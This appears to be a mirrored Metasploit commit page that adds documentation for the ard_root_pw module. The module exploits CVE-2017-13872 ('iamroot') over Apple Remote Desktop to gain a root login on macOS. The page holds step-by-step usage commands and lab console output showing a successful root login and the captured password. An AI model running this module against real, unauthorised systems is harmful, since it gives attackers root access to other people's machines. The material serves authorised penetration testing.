infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add ard_root_pw documentation

MS-2855/keylogger-mettle-extension
Brent Cook 2017-12-28 14:37:25 -06:00
parent c2bb144d0f
commit 5e71be7772
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
1 changed files with 38 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

38
documentation/modules/auxiliary/scanner/vnc/ard_root_pw.md Normal file
View File

@ -0,0 +1,38 @@
## Description
This module remotely exploits the remote CVE-2017-13872 (iamroot) vulnerability over Apple Remote Desktop protocol (ARD). It assumes that "System Preferences > Sharing > Screen Sharing" is enabled.
## Verification Steps
1. Do: `use auxiliary/scanner/vnc/ard_root_pw`
2. Do: `set RHOSTS [IP]`
4. Do: `run`
## Scenarios
**Running the scanner**
```
msf > use auxiliary/scanner/vnc/ard_root_pw
msf auxiliary(scanner/vnc/ard_root_pw) > set RHOSTS 172.16.143.129
RHOSTS => 172.16.143.129
msf auxiliary(scanner/vnc/ard_root_pw) > run
[*] 172.16.143.129:5900 - Attempting authentication as root.
[*] 172.16.143.129:5900 - Testing login as root with chosen password.
[+] 172.16.143.129:5900 - Login succeeded - root:xaavMPozB2HmDhGX
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
**Credentials**
```
msf auxiliary(scanner/vnc/ard_root_pw) > creds
Credentials
===========
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
172.16.143.129 172.16.143.129 5900/tcp (vnc) root xaavMPozB2HmDhGX Password
```